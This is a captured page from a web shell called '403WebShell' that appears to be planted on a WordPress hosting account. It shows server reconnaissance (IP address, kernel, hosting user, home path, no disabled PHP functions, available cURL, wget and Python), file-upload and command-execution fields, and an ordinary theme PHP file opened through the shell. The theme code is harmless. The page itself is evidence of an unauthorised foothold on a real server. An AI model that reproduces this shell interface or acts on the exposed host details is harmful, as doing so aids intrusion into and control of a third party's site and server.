Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.191.192.113
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/blog.diixadigital.com/wp-content/themes/rubik/inc/blocks/fullwidth/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/blog.diixadigital.com/wp-content/themes/rubik/inc/blocks/fullwidth/rubik_masonry.php
<?php
if (!class_exists('rubik_masonry')) {
    class rubik_masonry extends rubik_section_parent  {
    
        public function render( $page_info ) {
            global $rubik_dynamic_css;
            $uid = uniqid('masonry-');
            
            $rubik_dynamic_css = rubik_core::rubik_set_dynamic_css($page_info, $rubik_dynamic_css, $uid);
            
            $block_str = '';
            $cfg_ops = array();
            $cfg_ops = $this->cfg_options(); 
            $bk_post_icon = get_post_meta( $page_info['page_id'], $page_info['block_prefix'].'_post_icon', true );
            $excerpt_length = get_post_meta( $page_info['page_id'], $page_info['block_prefix'].'_excerpt_length', true );
            
            $bk_ajax_button = get_post_meta( $page_info['page_id'], $page_info['block_prefix'].'_ajax_button', true );
            $sec = '';
            if (substr( $page_info['block_prefix'], 0, 10 ) == 'bk_has_rsb') {
                $sec = 'has_sb';
                $col_width = '';
                parent::$rubik_ajax_c[$uid]['sec'] = 'has_sb';                         
            }else {
                $sec = 'fw';
                $col_width = 'container bkwrapper';
                parent::$rubik_ajax_c[$uid]['sec'] = 'fw';                         
            }
            
    // prepare ajax vars 
            $ajax_load_number = get_post_meta( $page_info['page_id'], $page_info['block_prefix'].'_ajax_load_number', true );
            
            parent::$rubik_ajax_c[$uid]['entries'] = $ajax_load_number;
            
            parent::$rubik_ajax_c[$uid]['offset'] = get_post_meta( $page_info['page_id'], $page_info['block_prefix'].'_offset', true );
            
            parent::$rubik_ajax_c[$uid]['post_icon'] = $bk_post_icon;
            
            parent::$rubik_ajax_c[$uid]['excerpt_length'] = $excerpt_length;
    ///////////////////////
                    
            $module_cfg = bk_get_cfg::configs($cfg_ops['fullwidth']['bk_masonry'], $page_info);    //get block config
            
            /** Tabs **/
            $rubik_tabs = get_post_meta( $page_info['page_id'], $page_info['block_prefix'].'_categorytabs', true );
            
            $rubikTabsToArray = explode(",",$rubik_tabs);
            
            if ($module_cfg['category_id'] != 0) {
                $catTabArray = explode(",",$module_cfg['category_id']);
            }else {
                $catTabArray = 0;
            }
            
            $tabs_amount = intval(count($rubikTabsToArray));
            
            rubik_section_parent::$rubik_ajax_c[$uid]['tabfirst']['cat'] = $catTabArray;
                
            rubik_section_parent::$rubik_ajax_c[$uid]['tabfirst']['content'] = '';
                
            if($tabs_amount > 0) {                
                for ($i=0; $i< $tabs_amount; $i++) {
                    rubik_section_parent::$rubik_ajax_c[$uid]['tab'.$i]['cat'] = $rubikTabsToArray[$i];
                    rubik_section_parent::$rubik_ajax_c[$uid]['tab'.$i]['loadmore'] = 'running';
                    rubik_section_parent::$rubik_ajax_c[$uid]['tab'.$i]['content'] = '';
                }
            }
            
            $the_query = bk_get_query::query($module_cfg, $uid);           //get query
    
    // locallize ajax vars 
    
            //wp_localize_script( 'rubik-module-load-post', 'ajax_c', parent::$rubik_ajax_c );
    
            $block_str .= '<div id="'.$uid.'" class="bkmodule module-masonry clearfix '.$col_width.'">';
            if ( $the_query->have_posts() ) :
                $block_str .= rubik_core::bk_get_block_title($page_info, $rubikTabsToArray);  //render block title
            endif;
            $block_str .= '<div class="bk-masonry-wrap">';
            $block_str .= '<div class="row clearfix">';
            $block_str .= '<ul class="bk-masonry-content bk-module-inner clearfix">';
            $block_str .= $this->render_modules($the_query, $sec, $bk_post_icon, $excerpt_length);            //render modules
            $block_str .= '</ul></div></div>';
            //Loadmore button 
            if($bk_ajax_button !== 'disable') {
                $block_str .= '<div class="masonry-ajax loadmore">';
                $block_str .= rubik_core::bk_get_load_more_buttom();
                $block_str .= '</div><!-- End Loadmore -->';
            }
            
            $block_str .= '</div>';
            
            unset($cfg_ops); unset($module_cfg); unset($the_query);     //free
            wp_reset_postdata();
            return $block_str;
    	}
        static function render_modules ($the_query, $sec, $bk_post_icon, $excerpt_length){
            $render_modules = '';
            $bk_contentout = new bk_contentout2;
            $custom_var = array (
                'thumbnail'     => 'rubik-masonry-size',
                'post-icon'     => $bk_post_icon,
                'except_length' => $excerpt_length,
            );
            if($sec == 'has_sb') {
                $col_width = 'col-md-6 col-sm-6';
            }else {
                $col_width = 'col-md-4 col-sm-6';
            }
            $bk_no_thumb = '';
            
            if ( $the_query->have_posts() ) :            
              
                while ( $the_query->have_posts() ): $the_query->the_post();
                    if(! rubik_core::bk_check_has_post_thumbnail( get_the_ID() )) {
                        $bk_no_thumb = 'bk_no_thumb';
                    }else {
                        $bk_no_thumb = '';
                    }
                    $render_modules .= '<li class="'.$col_width.' item">';
                    $render_modules .= '<div class="row-type content_out '.$bk_no_thumb.'">';
                    $render_modules .= $bk_contentout->render($custom_var);
                    $render_modules .= '</div>';
                    $render_modules .= '</li><!-- end post item -->';
                endwhile;
                
            endif;
            return $render_modules;
        }
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit